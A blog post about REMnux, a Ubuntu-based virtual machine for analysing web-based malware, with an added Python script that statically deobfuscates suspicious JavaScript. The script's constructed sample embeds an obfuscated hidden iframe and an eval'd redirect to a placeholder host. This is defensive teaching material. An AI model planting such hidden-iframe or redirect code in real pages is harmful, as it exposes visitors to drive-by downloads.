A security consultant has released an Ubuntu-based Linux distribution built specifically for analyzing and reverse-engineering malware. Lenny Zeltser released REMnux on SourceForge on Thursday, and it has already been downloaded nearly 2,000 times.
REMnux is not a brand-new distro built from scratch but a stripped-down version of Ubuntu, distributed as a VMware virtual machine and loaded with hand-picked analysis tools.
The idea is that you run the suspect code inside that isolated virtual machine, not on your own workstation, watch what it does, and REMnux's tools help you work out what kind of nasty game the code is playing.
Zeltser said he built REMnux specifically to focus on Web-based malware rather than to include every possible tool. According to the ThreatPost blog:
But it is not intended as a be-all-end-all tool. It isn't geared toward analyzing Windows malware, Zeltser explains; he recommends the Zero Wine project for that. Nor is it the only Linux-based malware analysis toolkit: he notes that a more full-featured one is the SANS Investigative Forensic Toolkit (SIFT) Workstation. CERT also offers the CERT Linux Forensics Tools Repository, based on Fedora and billed as a collection of tools useful for security forensics. There are other popular tools for reverse engineering Windows- and Linux-based code specifically, such as IDA Pro. (I freely admit that I don't know enough about security forensics to understand how apples-to-oranges these tools are. If you have other favorites, please share.)
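To make the "Web-based malware" focus concrete, here is a small added example (written for this page, not code from REMnux or from Zeltser) of the kind of first pass an analyst does on a suspicious page before running anything: statically peel back the two most common string-hiding tricks in drive-by pages, unescape('%XX...') and String.fromCharCode(...), and list the URLs and hidden iframes that surface. The script evaluates no JavaScript, so it is safe to run on the analysis host. The sample page it chews on is constructed for the example; the hostname example.invalid is a placeholder, not a real indicator.

```python
"""Static first pass over an obfuscated web-malware snippet (added example).

Decodes unescape('%XX..'/'%uXXXX') and String.fromCharCode(n, n, ...) without
evaluating any JavaScript, then reports the URLs and iframes that surface.
"""
import re

# Constructed sample page, not a real capture. It hides an invisible iframe
# behind unescape() and a redirect behind String.fromCharCode()+eval().
SAMPLE = r"""
<script>
var a = unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fload.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E');
document.write(a);
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,103,111,39));
</script>
"""

# unescape('...') / unescape("...") with a literal argument; a quote escaped
# inside the literal is not handled, which is a known limit of this quick pass.
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
# String.fromCharCode(65, 66, ...) with a literal numeric argument list.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
# Backslash excluded so a re-quoted literal's escape does not stick to the URL.
URL_RE = re.compile(r"""https?://[^\s'"<>\\]+""")
IFRAME_RE = re.compile(r"<iframe[^>]*>", re.I)


def js_unescape(s: str) -> str:
    """Mimic JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a byte."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def from_char_code(arg_list: str) -> str:
    """Turn the argument list of String.fromCharCode(...) into the string it builds."""
    return "".join(chr(int(n)) for n in arg_list.split(",") if n.strip())


def js_literal(s: str) -> str:
    """Re-emit decoded text as a single-quoted JS literal so later passes can see it."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def deobfuscate(js: str, max_rounds: int = 5) -> str:
    """Apply both decoders repeatedly; layers are often nested inside each other."""
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: js_literal(js_unescape(m.group(2))), js)
        new = FROMCHARCODE_RE.sub(lambda m: js_literal(from_char_code(m.group(1))), new)
        if new == js:
            break
        js = new
    return js


def extract_indicators(js: str) -> dict:
    """Decode, then pull out what an analyst wants first: URLs, iframes, eval use."""
    decoded = deobfuscate(js)
    return {
        "urls": sorted(set(URL_RE.findall(decoded))),
        "iframes": IFRAME_RE.findall(decoded),
        "uses_eval": "eval(" in decoded,
        "uses_document_write": "document.write(" in decoded,
        "decoded": decoded,
    }


if __name__ == "__main__":
    report = extract_indicators(SAMPLE)
    for key in ("urls", "iframes", "uses_eval", "uses_document_write"):
        print(f"{key}: {report[key]}")
```

Two of the surfaced strings, the zero-size iframe and a document.location redirect fed to eval(), are exactly the patterns this pass is meant to expose; anything that survives it is what you then take into the VM and run.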
I asked Zeltser via Twitter why he created REMnux when these other tools, particularly SANS's own SIFT, are already available. He replied, "SIFT is great, but can be overwhelming to a person getting started with malware analysis. We may merge REMnux into SIFT some day."
For all that it isn't, Zeltser's Ubuntu-based OS has still been earning praise in the security blogosphere. This is in part because Zeltser is a well-known malware analysis instructor for the SANS Institute as well as an author and an incident handler at the Internet Storm Center. He also leads the security consulting practice at Savvis.
REMnux is available for download from SourceForge.
The Source Seeker blog is written by Julie Bort, editor of the Open Source Subnet site as well as the Microsoft Subnet and Cisco Subnet sites. Bort is the Online Community Editor for all of Network World and also writes The Microsoft Update blog. If you have an idea for a blog, or a news tip on open source, Microsoft or Cisco, contact her at 970-482-6454 or follow Julie on Twitter @Julie188.